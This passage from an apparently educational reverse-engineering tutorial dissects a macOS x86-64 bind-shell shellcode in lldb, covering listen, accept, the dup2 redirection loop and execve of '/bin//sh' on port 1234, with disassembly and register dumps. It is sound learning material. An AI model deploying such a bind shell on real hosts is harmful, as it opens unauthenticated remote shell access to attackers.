0x7ff7bfeff870: 00 02 04 d2 00 00 00 00 1e d5 00 00 01 00 00 00 ................
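Now, using the graphical schema that we have shown before will help visualising memory allocation. Reading the 16 bytes at 0x7ff7bfeff870 field by field:
- 00 is sin_len (left at zero by the shellcode);
- 02 is sin_family, i.e. AF_INET;
- 04 d2 is sin_port: 0x04d2 = 1234, stored in network (big-endian) byte order;
- 00 00 00 00 is sin_addr;
- 1e d5 00 00 01 00 00 00 is sin_zero, here just whatever was already on the stack.
00 00 00 00 is a constant defined in in.h (the symbolic name is INADDR_ANY) and means that the socket is bound to every network interface of the host - in other words, the shellcode will accept incoming connections from any host that can reach it.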
This closes the analysis of bind. Phew!
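For comparison, this is how the same address would normally be filled in from C. It is a sketch, and make_bind_address is a hypothetical name: unlike the shellcode it zeroes sin_zero and, on macOS, sets sin_len, but the port and address bytes (04 d2 00 00 00 00) match the dump above.

```c
#include <stdint.h>
#include <string.h>       /* memset */
#include <arpa/inet.h>    /* htons, htonl */
#include <netinet/in.h>   /* struct sockaddr_in, INADDR_ANY */
#include <sys/socket.h>   /* AF_INET */

/* The address the shellcode pushes in its preamble:
 * AF_INET, the given port in network byte order, INADDR_ANY. */
struct sockaddr_in make_bind_address(uint16_t port)
{
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
#ifdef __APPLE__
    sa.sin_len = sizeof sa;                 /* BSD-only; the shellcode leaves it 0 */
#endif
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);              /* 1234 -> bytes 04 d2 */
    sa.sin_addr.s_addr = htonl(INADDR_ANY); /* 0.0.0.0 -> 00 00 00 00 */
    return sa;
}
```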
Listen
The disassembled code for this chunk doesn't differ from the original:
0x100003f84 <+39>: push rax
0x100003f85 <+40>: pop rsi
0x100003f86 <+41>: push rbp
0x100003f87 <+42>: pop rax
0x100003f88 <+43>: mov al, 0x6a
0x100003f8a <+45>: syscall
Here the syscall has number 106, which is defined in the syscalls.master file as follows:
106 AUE_LISTEN ALL { int listen(int s, int backlog) NO_SYSCALL_STUB; }
so we follow the methodology that we adopted before: it should be clear by now that the first thing to do is launching man 2 listen and analysing the result. In this case, the API is defined as follows:
#include <sys/socket.h>
int listen(int socket, int backlog);
Creation of socket-based connections requires several operations. First, a socket is created with socket(2). Next, a willingness to accept incoming connections and a queue limit for incoming connections are specified with listen(). Finally, the connections are accepted with accept(2). The listen() call applies only to sockets of type SOCK_STREAM.
The backlog parameter defines the maximum length for the queue of pending connections. If a connection request arrives with the queue full, the client may receive an error with an indication of ECONNREFUSED. Alternatively, if the underlying protocol supports retransmission, the request may be ignored so that retries may succeed.
In this case, we are happy with no backlog management, so we pass zero.
The instructions <+39> to <+42> set the contents of RSI to those of RAX, and the contents of RAX to those of RBP:
Register | Before | After |
---|---|---|
RAX | 0x0000000000000000 | 0x0000000002000000 |
RBP | 0x0000000002000000 | 0x0000000002000000 |
RSI | 0x00007ff7bfeff870 | 0x0000000000000000 |
The final effect is zeroing RSI: RAX held 0, the return value of the successful bind() call, and RSI carries the second argument (backlog). At the same time, RAX is prepared for the syscall. The first argument is passed through the register RDI, which was set before and has not changed since.
(lldb) register read rdi
rdi = 0x0000000000000003
So, the effect of the instruction <+43> is to set the lowest byte of rax to 106 (0x6a) and prepare for the syscall, which is at <+45>.
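Steps 1 to 3 together, written against the C API, give a listening socket. In this sketch make_listener is a hypothetical helper and, as a deliberate deviation from the shellcode, it binds to 127.0.0.1 rather than INADDR_ANY so that nothing becomes reachable from other hosts; passing port 0 lets the kernel choose a free port. The backlog is 0, as in the shellcode.

```c
#include <stdint.h>
#include <string.h>
#include <arpa/inet.h>    /* htons, htonl */
#include <netinet/in.h>   /* struct sockaddr_in, INADDR_LOOPBACK, IPPROTO_IP */
#include <sys/socket.h>   /* socket, bind, listen */
#include <unistd.h>       /* close */

/* socket() + bind() + listen(fd, 0), as in steps 1-3 of the shellcode,
 * but on the loopback address. Returns the listening descriptor, or -1. */
int make_listener(uint16_t port)
{
    int fd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    if (fd < 0)
        return -1;

    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);

    if (bind(fd, (struct sockaddr *)&sa, sizeof sa) < 0 || listen(fd, 0) < 0) {
        close(fd);
        return -1;
    }
    return fd;
}
```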
Accepting incoming connections
I must admit I have been a little puzzled by the remaining part of the disassembled code. Before commenting, let's take a look at what we have:
bindshell[0x100003f8c] <+47>: push rbp
bindshell[0x100003f8d] <+48>: pop rax
bindshell[0x100003f8e] <+49>: mov al, 0x1e
bindshell[0x100003f90] <+51>: cdq
bindshell[0x100003f91] <+52>: syscall
bindshell[0x100003f93] <+54>: xchg eax, edi
bindshell[0x100003f94] <+55>: push rbx
bindshell[0x100003f95] <+56>: pop rsi
There is only ONE syscall invocation, and there are no jump instructions, hence no loop.
The effect of the instructions <+47>...<+49> is preparing the syscall. The syscall number is 0x1e, or 30 in decimal.
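The reason for my puzzlement was my shallowness when analysing. I disassembled the main subroutine, but the loop starts at the dup_loop64 label. NASM emits that label as a separate symbol (we saw it in the symbol table earlier), so lldb treats it as another function and stops disassembling main right before it. In fact, if I execute: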
(lldb) disassemble -n dup_loop64
bindshell`dup_loop64:
bindshell[0x100003f96] <+0>: push rbp
bindshell[0x100003f97] <+1>: pop rax
bindshell[0x100003f98] <+2>: mov al, 0x5a
bindshell[0x100003f9a] <+4>: syscall
bindshell[0x100003f9c] <+6>: sub esi, 0x1
bindshell[0x100003f9f] <+9>: jns 0x100003f96 ; <+0>
bindshell[0x100003fa1] <+11>: xor esi, esi
bindshell[0x100003fa3] <+13>: cdq
bindshell[0x100003fa4] <+14>: movabs rbx, 0x68732f2f6e69622f
bindshell[0x100003fae] <+24>: push rdx
bindshell[0x100003faf] <+25>: push rbx
bindshell[0x100003fb0] <+26>: push rsp
bindshell[0x100003fb1] <+27>: pop rdi
bindshell[0x100003fb2] <+28>: push rbp
bindshell[0x100003fb3] <+29>: pop rax
bindshell[0x100003fb4] <+30>: mov al, 0x3b
bindshell[0x100003fb6] <+32>: syscall
I obtain the missing part of the code.
Now, if we look at other xnu versions, the API 30 is documented. In particular, at the URI https://opensource.apple.com/source/xnu/xnu-7195.50.7.100.1/bsd/kern/syscalls.master.auto.html we have the following:
30 AUE_ACCEPT ALL { int accept(int s, caddr_t name, socklen_t *anamelen) NO_SYSCALL_STUB; }
which is more actionable. The API is defined as
#include <sys/socket.h>
int accept(int socket, struct sockaddr *restrict address, socklen_t *restrict address_len);
the man page for this API contains:
The argument socket is a socket that has been created with socket(2), bound to an address with bind(2), and is listening for connections after a listen(2). accept() extracts the first connection request on the queue of pending connections, creates a new socket with the same properties of socket, and allocates a new file descriptor for the socket. If no pending connections are present on the queue, and the socket is not marked as non-blocking, accept() blocks the caller until a connection is present. If the socket is marked non-blocking and no pending connections are present on the queue, accept() returns an error as described below. The accepted socket may not be used to accept more connections. The original socket socket, remains open.
The argument address is a result parameter that is filled in with the address of the connecting entity, as known to the communications layer. The exact format of the address parameter is determined by the domain in which the communication is occurring. The address_len is a value-result parameter; it should initially contain the amount of space pointed to by address; on return it will contain the actual length (in bytes) of the address returned. This call is used with connection-based socket types, currently with SOCK_STREAM.
It is possible to select(2) a socket for the purposes of doing an accept() by selecting it for read.
Now let's reverse engineer this call. The status of the registers is:
Param. no. | Register | Value |
---|---|---|
1 | RDI | 0x0000000000000003 |
2 | RSI | 0x0000000000000030 |
3 | RDX | 0x0000000000000000 |
The first parameter is the usual file descriptor for the socket. Nothing new. As for the two remaining parameters, they are not very relevant here: the intended call is accept(s, 0, 0), and address and address_len are only needed when the caller wants to learn the address of the connecting peer.
Once the syscall is executed, accept() blocks until a client connects and then returns a new file descriptor for that connection. The values of RAX and RDI are then exchanged (instruction <+54>), so RAX will contain the socket file descriptor and RDI the connection file descriptor.
The instructions <+55> and <+56> simply copy the value of RBX (2, stored there by the second xchg at the end of the Socket part) into RSI.
Now the control flow reaches the dup_loop64 label, and we enter the Handle management section.
Before getting there, let's dump the status of the registers:
(lldb) register read
General Purpose Registers:
rax = 0x0000000000000003
rbx = 0x0000000000000002
rcx = 0x0000000100003f93 bindshell`main + 54
rdx = 0x0000000000000000
rdi = 0x000000000000000e
rsi = 0x0000000000000002
rbp = 0x0000000002000000
rsp = 0x00007ff7bfeff8a0
r8 = 0x00000000001085b1
r9 = 0xffffffff00000000
r10 = 0x0000000000000000
r11 = 0x0000000000000347
r12 = 0x00000001000883a0 dyld`_NSConcreteStackBlock
r13 = 0x00007ff7bfeff958
r14 = 0x0000000100003f5d bindshell`main
r15 = 0x0000000100074010 dyld`dyld4::sConfigBuffer
rip = 0x0000000100003f96 bindshell`dup_loop64
rflags = 0x0000000000000247
cs = 0x000000000000002b
fs = 0x0000000000000000
gs = 0x0000000000000000
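The accept(s, 0, 0) call discussed above can be exercised in-process by connecting to ourselves over the loopback interface. This is a hypothetical demo, not part of the shellcode: it binds to 127.0.0.1 on a kernel-chosen port and, unlike the shellcode, uses a backlog of 1 to stay clear of platform differences in how a zero backlog is handled. Passing NULL for both address and address_len simply means that the peer address is not reported.

```c
#include <string.h>
#include <arpa/inet.h>    /* htonl */
#include <netinet/in.h>   /* struct sockaddr_in, INADDR_LOOPBACK, IPPROTO_IP */
#include <sys/socket.h>   /* socket, bind, listen, getsockname, connect, accept */
#include <unistd.h>       /* close */

/* Listen on 127.0.0.1, connect to ourselves, then accept(lfd, NULL, NULL)
 * as the shellcode does. Returns the accepted descriptor, or -1. */
int accept_self_connection(void)
{
    int lfd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    if (lfd < 0)
        return -1;

    struct sockaddr_in sa;
    socklen_t len = sizeof sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK); /* port 0: kernel picks one */

    int cfd = -1, afd = -1;
    if (bind(lfd, (struct sockaddr *)&sa, sizeof sa) == 0
        && listen(lfd, 1) == 0
        && getsockname(lfd, (struct sockaddr *)&sa, &len) == 0) {
        cfd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
        if (cfd >= 0 && connect(cfd, (struct sockaddr *)&sa, sizeof sa) == 0)
            afd = accept(lfd, NULL, NULL);   /* accept(s, 0, 0) */
    }

    if (cfd >= 0)
        close(cfd);
    close(lfd);
    return afd;
}
```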
Handle management
We need to redirect STDIN, STDOUT, and STDERR to the newly created connection. This is accomplished in this loop:
0x100003f96 <+0>: push rbp
0x100003f97 <+1>: pop rax
0x100003f98 <+2>: mov al, 0x5a
0x100003f9a <+4>: syscall
0x100003f9c <+6>: sub esi, 0x1
0x100003f9f <+9>: jns 0x100003f96 ; <+0>
Before the loop starts, we have rsi = 0x0000000000000002. The instructions <+6> and <+9> respectively decrement the register and jump back to the label as long as the result is not negative (jns jumps when the sign flag is clear). In other words, rsi takes the values 2, 1, 0 throughout the loop, and the loop exits when it reaches -1. These are respectively the file descriptors of STDERR, STDOUT, and STDIN. Since rsi carries the second argument and rdi still holds the connection descriptor, the loop invokes the syscall once for each of the three descriptors. The first three instructions prepare the value of RAX for the syscall.
Now, 0x5a in decimal is 90, corresponding to the syscall:
90 AUE_DUP2 ALL { int sys_dup2(u_int from, u_int to); }
and we already know what we have to do: man 2 dup2.
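In short, dup2(r, n) makes descriptor n refer to the same object as r, closing n first if it was already open. After the loop, descriptors 0, 1 and 2 all refer to the accepted connection, so the shell started in the next step reads its input from the client and writes its output back to it: this implements the redirection.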
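The loop translates to a few lines of C. In this sketch dup_loop is a hypothetical helper, and its base parameter is an addition for illustration only: with base = 0 it performs the same dup2(r, 2), dup2(r, 1), dup2(r, 0) sequence as dup_loop64, while a non-zero base lets it be tried without touching the caller's own stdin, stdout and stderr.

```c
#include <unistd.h>   /* dup2 */

/* dup_loop64 in C: the counter starts at `start` (esi = 2), each pass
 * calls dup2(conn, base + i), then decrements and loops while the
 * result is non-negative (sub esi, 1 / jns). Unlike the shellcode, it
 * stops at the first failing dup2(). Returns 0 on success, -1 on error. */
int dup_loop(int conn, int base, int start)
{
    int i = start;
    do {
        if (dup2(conn, base + i) < 0)
            return -1;
        i -= 1;              /* sub esi, 1        */
    } while (i >= 0);        /* jns dup_loop64    */
    return 0;
}
```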
Shell execution
We already discussed this code in Come taste some shellcode....
Conclusions
This lesson has been very productive; in fact, we:
- learned how to produce null-byte-free code
- reviewed some techniques to set the syscall numbers
- learned about the sizes of some types
- got acquainted (hopefully!) with the AMD64 calling conventions
- learned a methodology to investigate syscalls
- learned how to pass pointers to routines, and something about the stack.
I must admit that lldb alone may not be sufficient for complex projects. I am making a point of approaching larger projects with two disassemblers side by side.